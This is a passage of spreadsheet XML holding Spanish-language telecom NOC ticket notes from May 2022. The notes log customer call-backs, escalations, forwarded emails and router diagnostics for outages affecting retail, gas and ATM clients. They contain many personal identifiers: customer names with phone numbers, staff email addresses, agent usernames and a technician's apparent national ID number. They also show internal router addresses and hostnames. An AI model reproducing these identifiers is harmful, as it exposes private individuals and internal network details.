    <t>**SE LLAMA A CLIENTE VICTOR NUÑEZ AL 2243-7253 CONTESTA EL SEÑOR SAUL ORELLANA  CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
ID 2001492252
**</t>
  </si>
  <si>
    <t>EL PEER YA SE ENCUENTRA ESTABLECIDO CORRECTAMENTE SE PROCEDE A VALIDAR CON EL CLIENTE VIA CORREO ELECTRONICO SE DEJA EN ETAPA  PENDIENTE CLIENTE
&lt;HHERCRMPN1W1N01O01EIM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE DATOS_WALMART PEER | I 10.201.11.222
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.36.6
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE DATOS_WALMART, ROUTER ID 10.179.36.6:
 TOTAL NUMBER OF PEERS : 292                 PEERS IN ESTABLISHED STATE : 289
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.201.11.222                    4       64529    42659    48122     0 0527H05M ESTABLISHED        2
&lt;HHERCRMPN1W1N01O01EIM1&gt;</t>
  </si>
  <si>
    <t>COLA DE CORRE CLIENTE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 5:57
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; VICTOR NUNEZ (VENDOR) &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI PARAISO ID: CONTR0001582910OC
ESTIMADO CLIENTE SE REALIZA REVISIÓN EN LA QUE SE ENCUENTRA QUE SE TUVO UN FLAPING EN SA SE ADJUNTAN EVIDENCIAS SE SOLICITA AL CLIENTE VALIDAR QUE SE ENCUENTRA CORRECTAMENTE OPERATIVO Y SIN TIEMPOS ALTOS EL SERVICIO.
&lt;HHERCRMPN1W1N01O01EIM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE DATOS_WALMART PEER | I 10
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRI
 BGP LOCAL ROUTER ID : 10.179.36.6
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE DATOS_WALMART, ROUTER ID 10.179.36.6:
 TOTAL NUMBER OF PEERS : 292                 PEERS IN ESTABLISHED STATE : 289
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOW
  10.201.11.222                    4       64529    42659    48122     0 0527H05
&lt;HHERCRMPN1W1N01O01EIM1&gt;
MAY 27 2022 03:12:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01OSPF/3/NBR_CHG_DOWN(L)[5]:NEIGHBOR EVENT:NEIGHBOR STATE CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORADDRESS=22.32.3.222, NEIGHBOREVENT=INACTIVITYTIMER, NEIGHBORPREVIOUSSTATE=FULL, NEIGHBORCURRENTSTATE=DOWN)
MAY 27 2022 03:01:30-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[6]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 02:10:10-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[7]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 01:39:52-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[8]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 00:52:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[9]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 00:35:54-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[10]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 26 2022 22:38:01-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[11]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)</t>
  </si>
  <si>
    <t>F4579226</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ASTRID JUAREZ QUIEN COMENTA QUE LOS EQUIPOS SI SE ENCUENTRAN CONECTADOS A UPS, PERO EL DÍA VIERNES FUERON RETIRADOS DEBIDO A QUE LA BATERIA SE QUEMO, INDICA QUE SE ESTARÁN INSTALANDO NUEVAMENTE EL DÍA DE HOY EN EL TRANSCURSO DE LA TARDE O EL DÍA DE MAÑANA POR LO QUE SOLICITA QUE SE DE SEGUIMIENTO EL DÍA DE MAÑANA A LAS 12:30 PARA CONFIRMAR SI YA SE INSTALARON LOS UPS NUEVAMENTE
3001062398
COLA:
NOMBRE: A: 42286856
NÚMERO: 011 50242286856
DURACIÓN: 0:02:00
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50242286856
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 30/05/2022 12:28:34</t>
  </si>
  <si>
    <t>F4579238</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MICHELL RODRIGUEZ AL 3367-1611 NO RESPONDE SE INTENTARA LUEGO **
ID 3001142600
**</t>
  </si>
  <si>
    <t>*** SE SOLICITAN AVANCES A CCR HN, PARA VALIDAR SI PROVEEDOR TENDRÁ ALGÚN COMENTARIO O TIEMPO DE FINALIZACIÓN DE LABORES ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 10:39
PARA: OLMAN J. ALVARADO BRITO &lt;OLMAN.ALVARADO@CLARO.COM.HN&gt;; MIGUEL EUSEBIO PINEDA ROCHA &lt;MIGUEL.PINEDA@CLARO.COM.HN&gt;; GUSTAVO ENRIQUE MENDOZA DIAZ &lt;GUSTAVOE.MENDOZA@CLARO.COM.HN&gt;; ERICKSON JAVIER NUNEZ ANDINO &lt;ERICKSON.NUNEZ@CLARO.COM.HN&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; PLANTAEXTERNAFO &lt;PLANTAEXTERNAFO@CLARO.COM.HN&gt;; OSCARSRAMIREZ@GMAIL.COM &lt;OSCARSRAMIREZ@GMAIL.COM&gt;; HON CCR &lt;HN.CCR@CLARO.COM.HN&gt;; OSCAR MAURICIO SANTOS FUNES &lt;OSCAR.SANTOS@CLARO.COM.HN&gt;
CC: NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ERICK VLADIMIR REYES CARVAJAL &lt;ERICKV.REYES@CLARO.COM.HN&gt;; JUAN CARLOS AGUILAR &lt;JAGUILAR@GEOREDCA.NET&gt;; O&amp;M DATOS &lt;O&amp;M.DATOS@CLARO.COM.HN&gt;; MANTENIMIENTOS DATOS &lt;MANTENIMIENTOS.DATOS@GEOREDCA.NET&gt;; HENRY ANDRE FUNES GOMEZ &lt;HENRY.FUNES@CLARO.COM.HN&gt;
ASUNTO: RE: EMPRESA: DA GAS, F4579238
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, FAVOR DE SU APOYO EN BRINDAR AVANCES DEL CASO.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MICHELL RODRIGUEZ- 33671611 INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR **
-ID 2001507505
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MICHELL RODRIGUEZ- 33671611 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001493506</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PERSONAL DE HONDURA SOLICITANDO INFORMACIÓN DE HORARIO DE ATENCIÓN DE CLIENTE
SE LLAMA A CLIENTE MICHELLE QUIEN INDICA QUE MAÑANA SABADO ESPERA A LOS TÉCNICOS A PARTIR DE LAS 6 AM
2001689827
COLA:
NOMBRE: A: 50433671611
NÚMERO: 50433671611
DURACIÓN: 0:01:24
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50433671611
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/05/2022 17:35:31
2001688830
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 22056099
NÚMERO: 22056099
DURACIÓN: 0:07:33
ESTADO: ACD - ASIGNADO A: ERITO.TECU
DETALLES: 22056099
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/05/2022 17:36:16</t>
  </si>
  <si>
    <t>SE REALIZA ESCALACION DE 6:15  SIGUIENTE ESCALACION 8:15 AM
TICKET	F4579238
CLIENTE	D GAS
DIRECCIÓN	CARRETERA SICAMAYA, PLANTA DA GAS
4/4	PASTOR RAMIREZ  	33910016 2 DÍA 03 HORAS	6:15:00
ESTADO ACTUAL	SE ESCALA CON CCR PARA EL SEGUIMIENTO CON PROVEEDOR MULTICABLES, CLIENTE AUN CON INCONVENIENTES,
TIEMPO ACUMULADO WO	2 DÍA 03 HORAS @PASTOR RAMIREZ</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MICHELL RODRIGUEZ  33671611 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001145957</t>
  </si>
  <si>
    <t>F4579239</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAYRIN ESTEFANI QUIROA AL 58008464 INIDCA QUE ESTA DEMASIADO LENTO EL SERVICIO || SE NOTIFICA A GESTOR **
ID 2001511457
**</t>
  </si>
  <si>
    <t>F4579267</t>
  </si>
  <si>
    <t>**SE  LLAMO A CLIENTE FRANCISCO SUAZO AL 8739-6320 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 2001595615
**</t>
  </si>
  <si>
    <t>**SE  LLAMO A CLIENTE FRANCISCO SUAZO AL 8739-6320 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001516277
**</t>
  </si>
  <si>
    <t>**SE  LLAMO A CLIENTE FRANCISCO SUAZO AL 8739-6320 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001541205
**</t>
  </si>
  <si>
    <t>F4579269</t>
  </si>
  <si>
    <t>EN TICKET  F4568032 SUPERVISOR DE TAVSA INFOMRA QUE CUENTA CON UPS PUNTO REMOTO, SIN EMBARGO PERSONAL DE PUNTO REMOTO BAJAN EL FLIPON QUE SUMIINISTRA ENERGÍA AL CAJERO EN PUNTO REMOTO.
DE: OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 17:53PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1634"
BUEN DÍA ESTIMADOS:
¿
¿SE ADJUNTA EL CORREO DE LOS COMENTARIOS DEL SUPERVISOR, ATM CUENTA CON UPS EL CUAL SE ENCUENTRA EN BUEN ESTADO, AL IGUAL DE QUE CUENTA CON UN REGULADOR DE VOLTAJE, SE INFORMA QUE EN EL LUGAR EL PERSONAL QUE LABORA EN DICHAS INSTALACIONES SON LAS QUE LE BAJAN LA PALANCA AL ATM, ES POR ELLO QUE EL ATM SE REINICIA CONSTANTEMENTE.
QUEDO AL PENDIENTE DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE ATIENDE CARLOS QUIEN INDCIA QUE EL CAJERO TIENE UN UPS FUNCIONAL PERO ESTOS SOLO SOPORTAN UN TIEMPO CORTO, QUE LOS REINICIOS HAN SIDO DEBIDO A QUE LOS CORTES DE ENERGÍA EN EL PUNTO REMOTO HAN SIDO POR TIEMPOS PROLONGADOS Y LOS UPS SE DESCARGAN, PERO CONFIRMA QUE SI TIENEN UPS FUNCIONAL EN EL CAJERO
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 12:54
FIN: HOY, 12:57
DURACIÓN: 3:15
ID DE LLAMADA: 3001072083</t>
  </si>
  <si>
    <t>SE LLAMO A 5B ATIENDE WALTER INDICA QUE VA A TRANSFERIR PERO LA LLAMADA SE CORTA
3001071313
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 30/05/2022 12:54:28</t>
  </si>
  <si>
    <t>F4579286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO ORDOÑEZ 55580811 MENCIONA QUE CONTINUA EL INCONVENIENTE, ADICIONAL MENCIONA QUE TIENEN CONTRATADO UN SERVICIO SIP (LLAMADAS) Y TAMBIEN ESTA CAIDO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001502118</t>
  </si>
  <si>
    <t>F4579307</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIRNA MORALES-42128627 --- COMENTA QUE IRA A PUNTO REMOTO PERO ESTA GESTIONANDO LA LLAVE PARA PODER ACCEDER A LOS EQUIPOS Y REVISAR SI ESTAN APAGADOS O INHIBIDOS ## PERO NO UBICA A LA PERSONA QUE TIENE LA LLAVE ## COMENTA QUE NO TIENE HORA PARA LLEGAR Y SE LE BRINDA EL NUMERO DE ACCESOS ##
2001517864
COLA:
NOMBRE: A: 42128627
NÚMERO: 42128627
DURACIÓN: 0:02:08
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42128627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 09:21:42
2001517864
COLA:
NOMBRE: A: 42128627
NÚMERO: 42128627
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 42128627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 09:19:53</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO ESTA EN PUNTO REMOTO PARA REALIZAR PRUEBAS + QUE SE LE LLAME EN 40 MINUTOS PARA VERIFICAR QUIEN NOS PUEDE APOYAR ##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIRNA MORALES-42128627  SE TIENEE N LINEA##
2001506075
COLA:
NOMBRE: A: 42128627
NÚMERO: 42128627
DURACIÓN: 0:00:51
ESTADO: CONECTADA
DETALLES: 42128627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 08:43:15</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE MIRNA MORALES-42128627  ENVIA A BUZON 2 VECES ##
SERVICIO SIGUE CAIDO- CLIENTE NO CONTESTA ## EN ESPERA QUE DEVUELVA LA LLAMADA
                   ETX-1300 - GSCPGTDJN1D1B03A04AFN0_DON_JUSTO
PHYSICAL LAYER &gt; FE STATUS
 *. PORT NAME                               (90001910400_CA1)
 *. PORT ROLE                               (USER PORT)
 *. ADMINISTRATIVE STATUS                   (ENABLE)
 *. OPERATIONAL STATUS                      &lt;DOWN&gt;
 *. AUTO NEGOTIATION                        (DISABLE)
 *. SPEED AND DUPLEX                        &lt;100M-FX FULL DUPLEX&gt;
 1. PORT NUM[1-32]                          (27)
@
PLEASE SELECT ITEM &lt;1 TO 1&gt;
F - FORWARD; B - BACKWARD
ESC - PREV MENU; ! - MAIN MENU; CTRL+X - EXIT                   [INS]&lt;1 MNGR&gt;
-------------------------------------------------------------------------------
2001573921
COLA:
NOMBRE: A: 42128627
NÚMERO: 42128627
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42128627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:22:57
2001574115
COLA:
NOMBRE: A: 42128627
NÚMERO: 42128627
DURACIÓN: 0:00:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42128627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:23:01</t>
  </si>
  <si>
    <t>F4579326</t>
  </si>
  <si>
    <t>SR. JAIRO VICENTE 55992752 DETECTO QUE EL UPS SE DAÑO ACTUALMENTE ESTA CONECTANDO EL ROUTER AL TOMA CORRIENTE DE LA PARED, PARA VALIDAR QUE ENCIENDA....</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JAIRO VICENTE 55992752 SE LE SOLICITA UBICAR Y REALIZAR PRUEBAS...</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE SR. JAIRO VICENTE 55992752 YA UBICO LOS EQUIPOS ACTUALMENTE ESTA VALIDANDO QUE EL ROUTER ESTA APAGADO, PROCEDE A REVISAR CONEXIONES DE RED Y ELECTRICAS ....</t>
  </si>
  <si>
    <t>F4579328</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ZOILA DE FRANCO/PR 79347216 ME COMUNICA CON WALTER VÉLIZ/IT CLIENTE; ÉSTE INDICA QUE DESDE HACE 9 DÍAS PERSISTE LO REPORTADO. SE LE INDICA QUE DEL LADO CLARO TODO OK, INDICA QUE HABLARÁ CON SU CENTRAL.
SE HABLÓ CON JORGE CONTRERAS/CLIENTE 41643688 INDICA QUE VERIFICARÁ DE MODO INTERNO Y SE MANTENGA SERVICIO EN MONITOREO HASTA EL DÍA MARTES 31 A LAS 12:00PM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE CONTRERAS 41643688 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001350710</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ZOILA DE FRANCO 79347216 MENCIONA QUE EL SERVICIO HA SIDO MUY INESTABLE, SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 2001569279</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZOILA DE FRANCO AL 79347216 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE PERO SOLICITA QUE SE LE LLAME A LAS 11:00 NUEVAMENTE PARA CONFIRMAR YA QUE HA ESTADO MUY
INESTABLE **
ID 2001522251
**</t>
  </si>
  <si>
    <t>F4579331</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE GARCIA AL 43112446 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001519091
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE GARCIA AL 43112446 || SE CONTACTA A CLIENTE, SE LE SOLICITA UN MOMENTO PARA LOCALIZAR A GESTOR PERO CORTA LLAMADA SE INTENTARA LUEGO  **
ID 2001542287
**</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA NELSON REYES PARA SOLICITAR AVANCES, SE LE INFORMA QUE HEMOS INTENTADO CONTACTAR AL PR SIN ÉXITO, SE PROCEDE A REALIZAR LLAMADA Y SE DEJA A CLIENTE DE LA CENTRAL Y PR EN CONFERENCIA CON GESTOR MARLON.RAMOS*/*/*/*</t>
  </si>
  <si>
    <t>F4579351</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CASIO CHENG AL 71503832 INDICA QUE  LA VELOCIDAD ESTA EN BAJADA A 7.5 Y EN SUBIDA SI ESTA BIEN A 10.6 || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 2001519782
**</t>
  </si>
  <si>
    <t>F4579360</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO ORELLANA 22431200 MENCIONA QUE YA LE LLAMARON PARA REALIZAR PRUEBAS Y LE INDICARON QUE ESTARIAN ENVIANDO TECNICO, A LA ESPERA DE AVANCES
-ID 2001517100</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO ORELLANA QUIEN INDICA QUE SI SE PUEDE LEVANTAR EL SERVICIO DE MANERA PROVICIONAL MIENTRAS SE RESTABLECE EL SERVICIO
2001556596
COLA:
NOMBRE: A: 22431200
NÚMERO: 22431200
DURACIÓN: 0:03:20
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22431200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 27/05/2022 10:42:52</t>
  </si>
  <si>
    <t>F4579366</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CHRISTIAN LOPEZ 41856203 CLIENTE REALIZA PRUEBAS Y VALIDA QUE TIENE LLAMADAS EN AMBOS SENTIDOS. AUTORIZA EL CIERRE EL CASO
ID: 2001517748</t>
  </si>
  <si>
    <t>F4579367</t>
  </si>
  <si>
    <t>PATCHCORD DE FO DAÑADO EN CLIENTE; SE ASIGNADO TÉCNICO A PR; SE LLAMÓ A CLIENTE 59661188 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4579371</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE OTONIEL EN PDV  G241 AL 79539903 QUIEN NOS COMENTA QUE EN ESTE MOMENTO NO CUENTA CON ENERGIA ELECTRICA EN SITIO
ID DE LLAMADA
2001521542</t>
  </si>
  <si>
    <t>F4579376</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE CECILIA VENAVENTE AL 59032458 CONFIRMA SERVICIO ESTABLE  Y OPERATIVO **
ID 2001560306
**</t>
  </si>
  <si>
    <t>TECNICO INDICA QUE SE CAMBIO DE PATCHCORD EN NODO, YA NO PASA POR ETX DIRECTO HACIA EL CLIENTE.
##SE DETIENE TIEMPO DE ESCALACION
##SE DA CODIGO DE CIERRRE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4579377</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE  MARIA MONZON  AL 50386321   INDICA QUE ACABA DE REGRESAR LA LUZ PERO NO RESTABLECIO EL SERVICIO || SE NOTIFICA A GESTOR **
ID 2001551766
**</t>
  </si>
  <si>
    <t>SE LE LLAMA AL CLIENTE MARIA FERNANDO MONZON 50386321  ID: 2001561271
COMENTA QUE AUN PERSISTEN LOS INCONVENIENTES, SE DEJA EN CONFERENCIA CON JURGEN.BOCH | WIP</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA MONZON 50386321  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001520110 - 2001520333</t>
  </si>
  <si>
    <t>F4579381</t>
  </si>
  <si>
    <t>SE ENVIA CPRREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 13:19
PARA: FLUTIN@BACCREDOMATIC.GT &lt;FLUTIN@BACCREDOMATIC.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 17400417T | CREDOMATIC GUATEMALA, S.A.
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO, ASÍ MISMO SOLICITAMOS DE SU APOYO INDICANDO FECHA Y HORA PARA PODER REALIZAR LA VISITA.
DIRECCIÓN: INTERNET_4 AVENIDA 4-27 ZONA 1 SAN CARLOS SIJA QUETZALTENANGO
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
CAYAX CHAVEZ, OSCAR EFRAIN	537660	2347762500901
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA LLAMADA EN 10 MINUTOS---</t>
  </si>
  <si>
    <t>TCNICO EN SITIO SE CORTA LLAMADA PROBLEMAS EN CIC</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN HILBERTO DIAZ AL 42144055 || SE CONTACTA A CLIENTE Y SE DEJA EN CONFERENCIA CON GESTOR **
ID 2001553444
**</t>
  </si>
  <si>
    <t>F4579397</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE DARÁ SEGUIMIENTO CON CLIENTE EN LA HORA QUE HIZO MENCIÓN 19:00/21:00 HORAS; PARA DETERMINAR LO REPORTADO.</t>
  </si>
  <si>
    <t>F4579399</t>
  </si>
  <si>
    <t>SE CONVERSA CON HUBERTO CHIQUILLO QUIEN INDICA QUE SE ENCUENTRA TECNICO EN SITIO, Y EL TECNICO INDICA QUE EQUIPO SE ENCUNTRA DAÑADO POR LO QUE SE PROCEDE A CREAR WO
ID DE LLAMADA: 2001564134</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO ANTONIO DIAZ AL 74784560 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001563398
**</t>
  </si>
  <si>
    <t>F4579403</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ROSA ALVAREZ 30248378 CONFIRMA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, SE PROCEDE AL CIERRE DEL TICKET
2001562983
COLA:
NOMBRE: A: 30248378
NÚMERO: 011 50230248378
ESTADO: CONECTADA
DURACIÓN: 0:00:37
DETALLES: +50230248378
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 27/05/2022 10:54:58</t>
  </si>
  <si>
    <t>F4579405</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE PARA QUE APOYE CON LA REVISIÓN.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 27 DE MAYO DE 2022 19:43PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCPAL CAIDO PARA CLIENTE "CC_TYT_GT_ATM049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L CAJERO SE ENCUENTRA ACTIVO POR EL ENLACE 3G POR LO QUE POSIBLEMENTE PRESENTE TIEMPOS ALTOS DE RESPUESTA.
TICKET: F4579405
ID: 47501013T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0498
UBICADO EN:  ATM 0498, TRANSPORTES MONJA BLANCA, 2 CALLE ZONA 4 COBAN ALTA VERAPAZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4579414</t>
  </si>
  <si>
